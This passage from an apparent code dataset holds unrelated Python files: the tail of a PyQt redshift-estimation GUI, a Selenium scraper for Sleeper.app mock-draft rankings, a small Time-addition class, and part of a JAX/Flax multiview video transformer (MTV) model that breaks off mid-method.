gauss_num=0),\n\t\t\t\t# sending out estZ to plot automatically without return pressed\n\t\t\t\tself.send_z_returnPressed.emit(self.newz[0])\n\t\telse:\n\t\t\tself.estZ.setText('nan')\n\t\tif not isnan(float(self.newz[1])):\n\t\t\tself.estZstd.setText(str(self.round_to_sigfig(newz[1], show_sigfig)))\n\t\telse:\n\t\t\tself.estZstd.setText('nan')\n\n\t# importing signal(filename) to slot\n\tdef _on_sent_filename(self, sent_filename):\n\t\tself.filename = sent_filename\n\n\t# importing signal(filenames) to slot\n\tdef _on_sent_filenames(self, sent_filenames):\n\t\tself.filenames = sent_filenames\n\n\t# importing signal(FitsObj) to slot\n\tdef _on_sent_fitsobj(self, sent_fitsobj):\n\t\tself.fitsobj = sent_fitsobj\n\t\t'''\n\t\tif self.fitsobj.z_est is not None:\n\t\t\t# change estZ from z_guess to z_est\n\t\t\tprint('found nonzero z_est')\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.fitsobj.z_est, 3)))\n\t\t\tself.send_message.emit('Esimated redshift is found in the database!')\n\t\telif self.fitsobj.z_guess is not None:\n\t\t\t# replace estZ if z_guess is available\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.fitsobj.z_guess, 3)))\n\t\t\tself.send_message.emit('Redshift posterior is found in the FITS file!')\n\t\t'''\n\n\t# action to \"Add to Table below\"\n\t# log available values to DataFrame\n\tdef _on_button_clicked(self, sfilename):\n\t\tif len(self.estZ.text().strip()) < 1:\n\t\t\tself.estZ.setText('nan')\n\t\tif len(self.estZstd.text().strip()) < 1:\n\t\t\tself.estZstd.setText('nan')\n\t\tif len(self.conf.text().strip()) < 1:\n\t\t\tself.conf.setText('0')\n\t\tif len(self.flag.text().strip()) < 1:\n\t\t\tself.flag.setText('No comments')\n\n\t\t# prepare exporting data\n\t\tdata = {'Name': self.filename,\n\t\t\t\t'z': self.newz[0], #float(self.estZ.text()),\n\t\t\t\t'z_err': self.newz[1], #float(self.estZstd.text()),\n\t\t\t\t'Confidence': float(self.conf.text()),\n\t\t\t\t'Linelist': self.l_lln.currentText(),\n\t\t\t\t'Flag': self.flag.text()}\n\t\t# add coordiantes if they are available\n\t\tif self.fitsobj.ra is not None:\n\t\t\tdata.update({'RA': self.fitsobj.ra,\n\t\t\t\t\t\t\t'DEC': self.fitsobj.dec})\n\t\t# add z_guess if it is available\n\t\tif self.fitsobj.z_guess is not None:\n\t\t\tdata.update({'z_guess': self.fitsobj.z_guess})\n\n\t\t# export data to DataFrame table\n\t\tself.send_data.emit(data)\n\n\t# importing data from table to slot\n\tdef _on_sent_dictdata(self, sent_dict):\n\t\t#print(self.filename)\n\t\t#print(sent_dict)\n\n\t\t# if received data is non-empty\n\t\t# add data back to corresponding LineEdit widgets\n\t\tif len(sent_dict) > 0:\n\t\t\t#print(sent_dict['z'])\n\t\t\tif not isnan(float(sent_dict['z'])):\n\t\t\t\t# extract z_estimated from z column\n\t\t\t\tif len(self.newz) < 2:\n\t\t\t\t\tself.newz.append(float(sent_dict['z']))\n\t\t\t\t\tself.newz.append(float(sent_dict['z_err']))\n\t\t\t\telse:\n\t\t\t\t\tself.newz[0] = float(sent_dict['z'])\n\t\t\t\t\tself.newz[1] = float(sent_dict['z_err'])\n\n\t\t\t\tshow_sigfig = 5\n\t\t\t\tprint(self.newz)\n\t\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.newz[0], show_sigfig)))\n\t\t\t\tif not isnan(float(self.newz[1])):\n\t\t\t\t\tself.estZstd.setText(str(self.round_to_sigfig(self.newz[1], show_sigfig)))\n\t\t\t\telse:\n\t\t\t\t\tself.estZstd.setText('nan')\n\t\t\t\tself.send_message.emit('Found estimated z in table!')\n\n\t\t\telif not isnan(float(sent_dict['z_guess'])):\n\t\t\t\t# extract z_estimated from z_guess column\n\t\t\t\tif len(self.newz) < 2:\n\t\t\t\t\tself.newz.append(float(sent_dict['z_guess']))\n\t\t\t\t\tself.newz.append(0.)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tself.newz[0] = float(sent_dict['z_guess'])\n\t\t\t\t\tself.newz[1] = nan\t\t\t\t\n\t\t\t\tself.estZ.setText(str(self.newz[0]))\n\t\t\t\tself.estZstd.setText(str(self.newz[1]))\n\t\t\t\n\t\t\tself.conf.setText(str(sent_dict['Confidence']))\n\t\t\tself.flag.setText(str(sent_dict['Flag']))\n\t\t\tself.l_lln.setCurrentText(str(sent_dict['Linelist']))\n\t\t\tself.send_message.emit(\"Can't find z in table! Use z_guess now..\")\n\t\telse:\n\t\t\t# sent_dict data is empy, reset everythin\n\t\t\tself.estZ.clear()\n\t\t\tself.estZstd.clear()\n\t\t\tself.newz = [nan, nan] # reset est_z and est_z_std back to nans\n\n\t\t\tself.conf.clear()\n\t\t\tself.flag.clear()\n\t\t\tself.l_lln.setCurrentIndex(0)\n\n\t# action to number of Gaussians selected\n\tdef _on_gauss_num_activated(self):\n\t\t# exporting signals\n\t\tself.send_gauss_num.emit(int(self.gauss_num.currentText()))\n\t\tself.send_linelists2multiG.emit(self.LINELISTS)\n\n\t# utility function to round values to desired significant figures\n\tdef round_to_sigfig(self, num=0., sigfig=1):\n\t\tif num is not None:\n\t\t\ttmp = log10(abs(num))\n\t\t\tif isinf(tmp):\n\t\t\t\treturn 0\n\t\t\telse:\n\t\t\t\treturn round(num, sigfig - int(floor(tmp)) - 1)\n\t\telse:\n\t\t\treturn None\n\n\t# load full content in all secondary linelist\n\tdef _addtional_linelist(self, i, s):\n\t\t# i = index of the widget passing linelist\n\t\t# s = name of the linelist\n\t\tllist = pd.DataFrame(columns=['wave', 'name'])\n\t\tif s in 'NONE':\n\t\t\tself.send_more_linelist.emit({i:s})\n\t\telse:\n\t\t\tllist = self._get_linelist_df(s)\n\n\t\t\tself.send_more_linelist.emit({i:llist})\n\n\t# action to press return on secondary z_guess LineEdit widgets\n\tdef _guess_z_return_pressed(self, i):\t\t\n\t\tllist = self._get_linelist_df(self.llists_2[i][1].currentText())\n\t\tif (len(self.llists_2[i][2].text()) < 1) | (self.llists_2[i][2].text().isalpha()):\n\t\t\tz_guess = 0\n\t\t\tself.llists_2[i][2].setText('0')\n\t\telse:\n\t\t\tz_guess = float(self.llists_2[i][2].text())\n\n\t\tif (self.llists_2[i][1].currentText() == 'NONE' ) & (z_guess == 0):\n\t\t\tpass\n\t\telse:\n\t\t\tself.send_more_linelist_z.emit([{i:llist}, z_guess])\n\n\t# action to read linelist as dataframe\n\tdef _get_linelist_df(self, linelist_name):\n\t\tllist = pd.DataFrame(columns=['wave', 'name'])\n\t\ttmp = read_line_list(linelist_name)\n\n\t\t#need a line to append wrest to name if it doesn't have one\n\t\tif any(map(str.isdigit, tmp[1]['ion'])):\n\t\t\t# if name column has wrest\n\t\t\tfor li in tmp:\n\t\t\t\tnewrow = {'wave': li['wrest'], 'name': li['ion']}\n\t\t\t\tllist = llist.append(newrow, ignore_index=True)\n\t\telse:\n\t\t\t# if name column doesn't have wrest, need to append\n\t\t\tfor li in tmp:\n\t\t\t\tnewrow = {'wave': li['wrest'], 'name': li['ion']+' '+str(round(li['wrest']))}\n\t\t\t\tllist = llist.append(newrow, ignore_index=True)\n\n\t\treturn llist","repo_name":"rongmon/rbcodes","sub_path":"GUIs/zgui/linelist_selection.py","file_name":"linelist_selection.py","file_ext":"py","file_size_in_byte":14272,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
+{"seq_id":"16123443937","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\n\nimport pandas as pd\nimport time\nfrom datetime import date\n\nUSERNAME = \"\" # Sleeper.app Username\nPASSWORD = \"\" # Sleeper.app Password\n\nchrome_options = Options()\n# If you uncomment these line the browser will run headless meaning\n# it wont open a browser window for you to look at\n# chrome_options.add_argument(\"--headless\")\n# chrome_options.add_argument(\"--disable-gpu\")\n\n# My chromedriver.exe is in the project path. Update accordingly\ndriver = webdriver.Chrome(executable_path='./driver/chromedriver.exe', options=chrome_options)\ndriver.get(\"https://sleeper.app/login\") # Get to the Login Page\n\n# Find Username field using XPath - Fill in Username\ndriver.find_element_by_xpath(\"//input\").send_keys(USERNAME)\n\n# Find Login Button - Clock\nloginButton = driver.find_element_by_xpath(\n '//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"login-button\", \" \" ))]')\nloginButton.click()\n\ntime.sleep(2)\n\n# After First Click Password Field Will Show Up - Enter Password and click again\ndriver.find_elements_by_xpath('//input')[1].send_keys(PASSWORD)\nloginButton.click()\n\n# LOGGED IN NOW - Waiting just to make sure\ntime.sleep(10)\n\n# Click Mock Draft Page - Click on first Mock Draft Found\n# HINT: You NEED to create this mock draft by hand before\ndriver.find_element_by_xpath(\n '//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"nav-draftboard-item\", \" \" ))]//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"title\", \" \" ))]').click()\ntime.sleep(5)\ndriver.find_element_by_class_name(\"draft-list-item\").click()\ntime.sleep(2)\n\n# Switch To New Mock Draft Tab\n# Although it looks like it, the active window is not yet the mock draft\ndriver.switch_to.window(driver.window_handles[1])\n\n# Init Data Loading Web Driver\nwait = WebDriverWait(driver, 15)\n\nscraped_elements = set() # Contains ID's of already scraped names\nexecute_loop = True\nrows_list = [] # Contains Dicts - Row of our DataFrame\nrank = 1 # Counter for Rank\nwhile execute_loop:\n # Get Visible Entries\n names = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.name-wrapper')))\n for name in names:\n if name.id in scraped_elements: # Already Scraped\n continue\n\n # New Player\n scraped_elements.add(name.id)\n data_extract = name.text.split('\\n')\n\n if len(data_extract) < 3: # Not Fully Loaded -> Remove Again\n scraped_elements.remove(name.id)\n break\n\n rows_list.append({\n \"rank\": rank,\n \"name\": data_extract[0],\n \"pos\": data_extract[1],\n \"team\": data_extract[2]\n })\n\n print(f\"{rank} - {data_extract[0]}\")\n\n rank += 1\n\n if len(rows_list) >= 300: # Only Scrape First 300 Players\n print(\"ABORTING..\")\n execute_loop = False\n\n # Scroll Down\n # .odd is every other row\n # (You could probably scroll down more/faster)\n ActionChains(driver).move_to_element(driver.find_elements_by_css_selector(\".odd\")[5]).perform()\n\n# Write CSV\ndf = pd.DataFrame(data=rows_list)\nprint(df)\ndf.to_csv(f\"data/sleeper-mock-ranks-{date.today()}.csv\", index=False)\ndriver.quit() # Quit\n","repo_name":"maxhuebner/maxhuebner.github.io","sub_path":"post/data/sleeper_extract_mock_data.py","file_name":"sleeper_extract_mock_data.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22681585926","text":"class Time:\n def __init__(self, hour=0, minute=0, second=0):\n self.hour = hour\n self.minute = minute\n self.second = second\n def __str__(self):\n return \"{}:{:02d}:{:02d}\".format(self.hour,self.minute, self.second)\n def __add__(self, other_time):\n new_time = Time()\n if (self.second + other_time.second) >= 60:\n self.minute += 1\n new_time.second = (self.second + other_time.second) - 60\n else:\n new_time.second = self.second + other_time.second\n if (self.minute + other_time.minute) >= 60:\n self.hour += 1\n new_time.minute = (self.minute + other_time.minute) - 60\n else:\n new_time.minute = self.minute + other_time.minute\n if (self.hour + other_time.hour) > 24:\n new_time.hour = (self.hour + other_time.hour) - 24\n else:\n new_time.hour = self.hour + other_time.hour\n return new_time\ndef main():\n time1 = Time(2, 12, 30)\n print(time1)\n time2 = Time(24, 41, 30)\n print(time1 + time2)\nmain()\n","repo_name":"InnovativeCoder/Innovative-Hacktober","sub_path":"Python/add_2times.py","file_name":"add_2times.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"}
+{"seq_id":"24789023481","text":"\"\"\"Implements the MTV model.\"\"\"\nimport functools\nfrom typing import Any, List, Sequence, Tuple, Union\n\nimport flax.linen as nn\nimport jax\nimport jax.numpy as jnp\nimport ml_collections\nfrom scenic.model_lib.layers import attention_layers\nfrom scenic.model_lib.layers import nn_layers\nfrom scenic.projects.baselines import vit\nfrom scenic.projects.mtv import model_utils\nfrom scenic.projects.vivit import model as vivit_model\nfrom scenic.train_lib import train_utils\n\n_DEFAULT_MTV_CONFIG = ml_collections.ConfigDict({\n 'dataset_configs': {\n 'num_frames': 8,\n },\n 'model':\n dict(\n view_configs=[\n ml_collections.ConfigDict({\n 'hidden_size': 16,\n 'patches': {\n 'size': (4, 4, 2)\n },\n 'num_heads': 2,\n 'mlp_dim': 32,\n 'num_layers': 1,\n })\n ],\n cross_view_fusion=None,\n temporal_encoding_config=ml_collections.ConfigDict({\n 'method': '3d_conv',\n 'kernel_init_method': 'central_frame_initializer',\n }),\n global_encoder_config=ml_collections.ConfigDict({\n 'num_layers': 2,\n 'mlp_dim': 8,\n 'num_heads': 2,\n 'hidden_size': 8,\n }),\n dropout_rate=0.,\n attention_dropout_rate=0.,\n classifier='token',\n data_dtype_str='float32')\n})\n\n\ndef get_model_cls(model_name):\n \"\"\"\"Selects MTV model type.\"\"\"\n if model_name == 'mtv_multiclass_classification':\n return MTVClassificationModel\n elif model_name == 'mtv_multihead_classification':\n return MTVMultiheadClassificationModel\n else:\n raise ValueError('Unrecognized model: {}'.format(model_name))\n\n\nclass CrossViewAttentionEncoderBlock(nn.Module):\n \"\"\"Crossview Transformer encoder layer.\n\n The encoder architecture for each view is as follows:\n Layer norm\n cross attention (out projection weights are initialized with zeros)\n residual connection\n Layer norm\n self attention (initialized with pretrained ViT weights)\n residual connection\n Layer norm\n MLP (initialized with pretrained ViT weights)\n residual connection\n\n We apply cross attention in a sequential fashion and limit it to only take\n place in neighboring views. For example, view[i-1] is used as the query and\n view[i] is used as key and value. This design is based on the assumption\n that the tubelet sizes grow from 0th view to the nth view. We initialize cross\n attention's weights with zeros and self attention and MLP weights are\n initialized with pretrained ViTs.\n\n Attributes:\n view_configs: Model configs for each view (e.g., num_heads, mlp_dim, etc).\n cross_view_fusion: Cross view fusion config.\n dtype: The dtype of the computation (default: float32).\n dropout_rate: Dropout rate.\n attention_dropout_rate: Dropout for attention heads.\n stochastic_depth: probability of dropping a layer linearly grows from 0 to\n the provided value.\n\n Returns:\n output after transformer encoder block.\n \"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n dtype: Any = jnp.float32\n dropout_rate: float = 0.0\n attention_dropout_rate: float = 0.0\n stochastic_depth: float = 0.0\n\n def _get_stochastic_depth_rate(self, cur_layer, view_idx):\n \"\"\"Returns the stochastic depth rate for the current layer and view.\"\"\"\n max_layer = max(self.view_configs[view_idx]['num_layers'] - 1, 1)\n return (cur_layer / max_layer) * self.stochastic_depth\n\n def _apply_self_attentions(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) -> List[jnp.ndarray]:\n \"\"\"Applies self attentions for each view.\"\"\"\n for view_idx, x in enumerate(tokens):\n if cur_layer >= self.view_configs[view_idx]['num_layers']:\n continue\n y = nn.LayerNorm(dtype=self.dtype, name=f'msa_ln_view{view_idx}')(x)\n config = self.view_configs[view_idx]\n y = nn.MultiHeadDotProductAttention(\n num_heads=config['num_heads'],\n dtype=self.dtype,\n broadcast_dropout=False,\n deterministic=deterministic,\n dropout_rate=self.attention_dropout_rate,\n name=f'msa_view{view_idx}')(y, y)\n y = nn.Dropout(rate=self.dropout_rate)(y, deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_idx)\n tokens[view_idx] += nn_layers.StochasticDepth(r)(y, deterministic)\n return tokens\n\n def _apply_cross_attention(\n self,\n tokens: List[jnp.ndarray],\n cur_layer: int,\n deterministic: bool,\n fuse_in_descending_order: bool,\n ) -> List[jnp.ndarray]:\n \"\"\"Applies cross view attention.\"\"\"\n xs = [\n nn.LayerNorm(dtype=self.dtype, name=f'cross_attention_ln_view{idx}')(x)\n for idx, x in enumerate(tokens)\n ]\n view_indices = (\n range(len(xs) -\n 1, 0, -1) if fuse_in_descending_order else range(len(xs) - 1))\n for view_index in view_indices:\n query_view_index = (\n view_index - 1 if fuse_in_descending_order else view_index + 1)\n key_value_view_index = view_index\n query = xs[query_view_index]\n key_value = xs[key_value_view_index]\n num_heads = (\n self.view_configs[query_view_index]['num_heads']\n if self.cross_view_fusion.use_query_config else\n self.view_configs[key_value_view_index]['num_heads'])\n qkv_features = (\n query.shape[-1]\n if self.cross_view_fusion.use_query_config else key_value.shape[-1])\n\n y = attention_layers.MultiHeadAttention(\n num_heads=num_heads,\n dtype=self.dtype,\n qkv_features=qkv_features,\n out_kernel_init=nn.initializers.zeros,\n dropout_rate=self.attention_dropout_rate,\n name=f'cross_attention_view{query_view_index}_{key_value_view_index}'\n )(query, key_value, deterministic=deterministic)\n y = nn.Dropout(rate=self.dropout_rate)(y, deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_index)\n tokens[query_view_index] += nn_layers.StochasticDepth(r)(y, deterministic)\n\n return tokens\n\n def _apply_mlp(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) ->List[jnp.ndarray]:\n \"\"\"Applies MLP block.\"\"\"\n for view_idx, x in enumerate(tokens):\n if cur_layer >= self.view_configs[view_idx]['num_layers']:\n continue\n y = nn.LayerNorm(dtype=self.dtype, name=f'mlp_ln_view{view_idx}')(x)\n y = attention_layers.MlpBlock(\n mlp_dim=self.view_configs[view_idx]['mlp_dim'],\n dtype=self.dtype,\n dropout_rate=self.dropout_rate,\n activation_fn=nn.gelu,\n kernel_init=nn.initializers.xavier_uniform(),\n bias_init=nn.initializers.normal(stddev=1e-6),\n name=f'mlp_view{view_idx}')(\n y, deterministic=deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_idx)\n tokens[view_idx] += nn_layers.StochasticDepth(r)(y, deterministic)\n return tokens\n\n @nn.compact\n def __call__(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) -> List[jnp.ndarray]:\n \"\"\"Applies CrossViewAttentionEncoderBlock module.\n\n Args:\n tokens: Input tokens from each view.\n cur_layer: Which layer we apply cross attention.\n deterministic: Deterministic or not (to apply dropout).\n\n Returns:\n Output tokens for each view.\n \"\"\"\n tokens = self._apply_cross_attention(\n tokens, cur_layer, deterministic,\n self.cross_view_fusion.get('fuse_in_descending_order', True))\n tokens = self._apply_self_attentions(tokens, cur_layer, deterministic)\n tokens = self._apply_mlp(tokens, cur_layer, deterministic)\n return tokens\n\n\nclass MultiviewEncoder(nn.Module):\n \"\"\"Multiview Transformer Encoder.\n\n Attributes:\n view_configs: Model configs for each view (e.g., num_heads, mlp_dim, etc).\n cross_view_fusion: Cross view fusion config.\n dropout_rate: Dropout rate.\n attention_dropout_rate: Dropout for attention heads.\n stochastic_depth: probability of dropping a layer linearly grows from 0 to\n the provided value. Our implementation of stochastic depth follows the\n timm library, which does per-example layer dropping and uses independent\n dropping patterns for each skip-connection.\n dtype: Any of activations.\n \"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n input_token_temporal_dims: Sequence[int]\n dropout_rate: float = 0.1\n attention_dropout_rate: float = 0.1\n stochastic_depth: float = 0.0\n dtype: Any = jnp.float32\n\n def _split_tokens_and_bottleneck(\n self, tokens: jnp.ndarray) -> Tuple[jnp.ndarray, jnp.ndarray]:\n \"\"\"Removes bottleneck tokens from input.\"\"\"\n return (tokens[:, :-self.cross_view_fusion.bottleneck_tokens],\n tokens[:, -self.cross_view_fusion.bottleneck_tokens:])\n\n def _add_posembed(self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Adds positional embeddings.\"\"\"\n temporal_dims_after_alignment = [\n t // min(self.input_token_temporal_dims)\n for t in self.input_token_temporal_dims\n ]\n xs = []\n for idx, t in enumerate(tokens):\n bs, spacetime, channels = t.shape\n reshaped_t = t.reshape(\n (bs, temporal_dims_after_alignment[idx], -1, channels))\n add_posembed_fn = vit.AddPositionEmbs(name=f'posembed_input_view{idx}')\n x = jax.vmap(add_posembed_fn, in_axes=1, out_axes=1)(reshaped_t)\n xs.append(x.reshape(bs, spacetime, channels))\n return xs\n\n def _build_with_bottleneck(\n self,\n xs: List[jnp.ndarray],\n bottleneck: jnp.ndarray,\n fusion_layers: Sequence[int],\n max_num_layers: int,\n train: bool,\n dtype: Any,\n ) -> List[jnp.ndarray]:\n \"\"\"Builds the encoder with bottlenecks.\"\"\"\n view_indices = list(range(len(self.view_configs)))\n if self.cross_view_fusion.get('fuse_in_descending_order', True):\n view_indices.reverse()\n for lyr in range(max_num_layers):\n for view_idx in view_indices:\n view_config = self.view_configs[view_idx]\n if lyr >= view_config['num_layers']:\n continue\n if lyr in fusion_layers:\n if xs[view_idx].shape[-1] != bottleneck.shape[-1]:\n bottleneck = nn.Dense(\n xs[view_idx].shape[-1],\n kernel_init=nn.initializers.xavier_uniform(),\n name=f'bottleneck_linear_{lyr}_view{view_idx}')(\n bottleneck)\n xs[view_idx] = jnp.concatenate([xs[view_idx], bottleneck], axis=1)\n\n xs[view_idx] = vit.Encoder1DBlock(\n mlp_dim=view_config['mlp_dim'],\n num_heads=view_config['num_heads'],\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=(lyr / max(view_config['num_layers'] - 1, 1)) *\n self.stochastic_depth,\n name=f'encoderblock_{lyr}_view{view_idx}',\n dtype=self.dtype)(\n xs[view_idx], deterministic=not train)\n if lyr in fusion_layers:\n xs[view_idx], bottleneck = self._split_tokens_and_bottleneck(\n xs[view_idx])\n return xs\n\n def _build_with_cross_view_attention(\n self,\n xs: List[jnp.ndarray],\n fusion_layers: Sequence[int],\n max_num_layers: int,\n train: bool,\n dtype: Any,\n ) -> List[jnp.ndarray]:\n \"\"\"Builds the encoder with bottlenecks.\"\"\"\n for lyr in range(max_num_layers):\n if lyr in fusion_layers:\n xs = CrossViewAttentionEncoderBlock(\n view_configs=self.view_configs,\n cross_view_fusion=self.cross_view_fusion,\n dtype=self.dtype,\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n name=f'cross_view_encoderblock_{lyr}')(\n xs, lyr, deterministic=not train)\n else:\n for view_idx, view_config in enumerate(self.view_configs):\n if lyr >= view_config['num_layers']:\n continue\n xs[view_idx] = vit.Encoder1DBlock(\n mlp_dim=view_config['mlp_dim'],\n num_heads=view_config['num_heads'],\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=(lyr / max(view_config['num_layers'] - 1, 1)) *\n self.stochastic_depth,\n name=f'encoderblock_{lyr}_view{view_idx}',\n dtype=self.dtype)(\n xs[view_idx], deterministic=not train)\n return xs\n\n @nn.compact\n def __call__(self,\n tokens: Sequence[jnp.ndarray],\n bottleneck: Union[jnp.ndarray, None],\n train: bool = False) -> List[jnp.ndarray]:\n \"\"\"Applies Transformer model on the tokens.\n\n This function will be called within a vmap along the time axis. Before\n calling this function, we need to make sure all elements in the list have\n the same temporal dimension.\n\n Args:\n tokens: A sequence of input tubelet tokens. Each one is a 3D float tensor\n of shape (batch, sequence_len, channels). We assume that tokens[0]\n contains tokens from the largest view while tokens[-1] are from the\n smallest view. We define a view as a representation of the input video\n composed of tubelets. A larger view corresponds to larger tubelets.\n bottleneck: A 3D float tensor of shape (batch, num_tokens, channels)\n representing a set of tokens used for fusing information among views.\n train: Whether or not it is in training.\n\n Returns:\n A list of activations after encoding for each view. They have the same\n shapes as their input counterparts.\n \"\"\"\n\n for t in tokens:\n assert t.ndim == 3 # Shape is `[batch, len, emb]`.\n dtype = jax.dtypes.canonicalize_dtype(self.dtype)\n xs = self._add_posembed(tokens)\n max_num_layers = max([config['num_layers'] for config in self.view_configs])\n fusion_layers = ([] if self.cross_view_fusion is None else\n self.cross_view_fusion.fusion_layers)\n\n if (self.cross_view_fusion is None or\n self.cross_view_fusion.type == 'cross_view_attention'):\n return self._build_with_cross_view_attention(xs, fusion_layers,\n max_num_layers, train, dtype)\n if self.cross_view_fusion.type == 'bottleneck':\n return self._build_with_bottleneck(xs, bottleneck, fusion_layers,\n max_num_layers, train, dtype)\n raise ValueError(\n f'Invalid cross view fusion type: {self.cross_view_fusion.type}.')\n\n\nclass MTV(nn.Module):\n \"\"\"MTV model.\"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n temporal_encoding_config: ml_collections.ConfigDict\n global_encoder_config: ml_collections.ConfigDict\n input_token_temporal_dims: Sequence[int]\n num_classes: int\n classifier: str\n dropout_rate: float = 0.1\n attention_dropout_rate: float = 0.1\n stochastic_depth: float = 0.0\n keep_spatiotemporal_features: bool = False\n final_endpoint: str = 'logits'\n dtype: Any = jnp.float32\n\n def _add_cls_token(self, x: jnp.ndarray, name: str) -> jnp.ndarray:\n \"\"\"Prepends CLS token.\n\n Args:\n x: A 3D float tensor of shape (batch, sequence_len, channels) representing\n the tokens.\n name: Parameter name of the added CLS token.\n\n Returns:\n A 3D float tensor with prepended CLS token. Its new shape is (batch,\n sequence_len+1, channels).\n \"\"\"\n if self.classifier == 'token':\n bs, _, c = x.shape\n cls = self.param(name, nn.initializers.zeros, (1, 1, c), x.dtype)\n cls = jnp.tile(cls, [bs, 1, 1])\n x = jnp.concatenate([cls, x], axis=1)\n return x\n\n def _add_cls_tokens_all_frames(self, x: jnp.ndarray,\n name: str) -> jnp.ndarray:\n \"\"\"Prepends CLS token for all frames.\n\n Args:\n x: A 4D float tensor of shape (batch, time, sequence_len, channels)\n representing the tokens.\n name: Parameter name of the added CLS token.\n\n Returns:\n A 4D float tensor with prepended CLS token. Its new shape is (batch, time,\n sequence_len+1, channels).\n \"\"\"\n if self.classifier == 'token':\n bs, time, _, c = x.shape\n cls = self.param(name, nn.initializers.zeros, (1, time, 1, c), x.dtype)\n cls = jnp.tile(cls, [bs, 1, 1, 1])\n x = jnp.concatenate([cls, x], axis=2)\n return x\n\n def _add_cls_tokens_for_all_views(\n self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Prepends CLS tokens for all views.\n\n Args:\n tokens: Tokens from all views. Each one has a shape of (batch, time,\n sequence_len, channels)\n\n Returns:\n A list of tokens with CLS tokens added. Each one has a new shape of\n (batch, time, sequence_len+1, channels).\n \"\"\"\n outputs = []\n for idx, x in enumerate(tokens):\n outputs.append(self._add_cls_tokens_all_frames(x, name=f'cls_view{idx}'))\n return outputs\n\n def _extract_encoder_output(self,\n x: jnp.ndarray,\n axis: int = 1) -> jnp.ndarray:\n \"\"\"Extracts encoder output.\"\"\"\n if self.classifier in ['token', '0']:\n x = x.take(indices=0, axis=axis)\n elif self.classifier in ('gap', 'gmp', 'gsp'):\n fn = {'gap': jnp.mean, 'gmp': jnp.max, 'gsp': jnp.sum}[self.classifier]\n x = fn(x, axis=list(range(axis, x.ndim - 1)))\n return x\n\n def _tokenize(self, x: jnp.ndarray) -> List[jnp.ndarray]:\n \"\"\"Creates tokens for each view.\n\n Args:\n x: A 5D float tensor of shape (batch, time, height, width, channels)\n representing the input video.\n\n Returns:\n Tokens for each view and each one has a shape of (batch, time,\n sequence_len, channels).\n \"\"\"\n tokens = []\n for idx, config in enumerate(self.view_configs):\n view_tokens, _ = vivit_model.temporal_encode(\n x,\n self.temporal_encoding_config,\n ml_collections.ConfigDict(config['patches']),\n config['hidden_size'],\n return_1d=False,\n name=f'embedding_view{idx}')\n bs, t, h, w, c = view_tokens.shape\n view_tokens = view_tokens.reshape(bs, t, h * w, c)\n tokens.append(view_tokens)\n return tokens\n\n def _align_temporal_dimension_across_views(\n self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Reshapes tokens from each view so they have the same temporal dim.\"\"\"\n min_temporal_dim = min(self.input_token_temporal_dims)\n outputs = []\n for t in tokens:\n bs, time, n, c = t.shape\n outputs.append(\n t.reshape(bs, min_temporal_dim, (n * time) // min_temporal_dim, c))\n return outputs\n\n def _merge_views_along_time_axis(self, tokens: Sequence[jnp.ndarray],\n hidden_size: int) -> jnp.ndarray:\n \"\"\"Merges tokens from each view along the time axis.\"\"\"\n projected_tokens = []\n for view_idx, x in enumerate(tokens):\n bs, time, n, c = x.shape\n x = x.reshape(bs, self.input_token_temporal_dims[view_idx],\n (time * n) // self.input_token_temporal_dims[view_idx], c)\n if not self.keep_spatiotemporal_features:\n x = self._extract_encoder_output(x, axis=2)\n projected_tokens.append(\n nn.Dense(\n hidden_size,\n kernel_init=nn.initializers.xavier_uniform(),\n name=f'global_encoder_linear_view{view_idx}')(x))\n return jnp.concatenate(projected_tokens, axis=1)\n\n def _merge_views_along_channel_axis(\n self, tokens: Sequence[jnp.ndarray]) -> jnp.ndarray:\n \"\"\"Merges tokens from each view along the channel axis.\"\"\"\n max_temporal_dim = max(self.input_token_temporal_dims)\n xs = []\n for idx, x in enumerate(tokens):\n bs, time, n, c = x.shape\n x = x.reshape(bs, self.input_token_temporal_dims[idx],\n (time * n) // self.input_token_temporal_dims[idx], c)\n if self.keep_spatiotemporal_features:\n xs.append(jnp.tile(x, (1, max_temporal_dim // x.shape[1], 1, 1)))\n else:\n x = self._extract_encoder_output(x, axis=2)\n xs.append(jnp.tile(x, (1, max_temporal_dim // x.shape[1], 1)))\n return jnp.concatenate(xs, axis=-1)\n\n def _global_encode(self, tokens: Sequence[jnp.ndarray],\n is_train: bool) -> jnp.ndarray:\n 